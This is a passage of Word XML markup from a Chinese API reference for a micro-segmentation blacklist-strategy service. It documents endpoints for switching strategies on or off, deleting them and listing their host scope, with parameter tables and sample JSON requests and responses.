              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0E2457" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3294FF3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191094A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71E2E7C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="565DB5EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6418AF24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2203EFD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C13E272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B487EF1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E1EE18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E77E8DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592D071A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F765FDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开启:1 关闭：0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="573AE5B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AF180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "switchStatus":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F7D70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C0589" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D1610"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4BD6DC8B"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D542D9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7166DD03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1239BB65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AE60EEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD7ABF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48EC2886" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DB6CB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="48A6FD43" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D79C9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A069A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D015F04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D09CC51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494EC0E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4AC497" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6864C5EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF03A9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="4A053DD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="删除策略接口"/>
      <w:bookmarkEnd w:id="230"/>
      <w:r>
        <w:t>删除策略接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621A8AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14512408" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/ms-srv/api/black-strategy/delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E01450"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0E69275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A77E687" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24D39BFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651415AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E903C61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="425202CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7317D141" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C3ACD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CA8242" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F3E2D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F429B96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957A1E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids":["5fa27259dae9af8a"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB2802" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AAFB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2E069"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2EDDF8D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2C7DE15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689F9F79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB5C89C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3AB7A49C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A026BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EFA6025" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46475C95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17634091" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3232BE67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FBF4511" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C97A3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="582B50D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B0BC50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78352765" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3541D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C8EE06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="07600C36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="查看策略主机范围"/>
      <w:bookmarkEnd w:id="231"/>
      <w:r>
        <w:t>查看策略主机范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC137A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180D8D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/black-strategy/strategy-host-list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A608E"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1875"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1030"/>
        <w:gridCol w:w="6281"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0761126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426FBE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0699CDD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557A888C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58D53BB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06E8A3B9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320AFBD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6C3075" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538BF209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD134F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25385119" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25DD9D17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msSwitchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41E04DA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550EDDE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3663942D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离插件状态，0-关闭</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2204492F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C8C023F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223F26BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BBE2A9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79753F24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="54C3B9E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1978425B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyHostType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35964BF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61ED1154" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
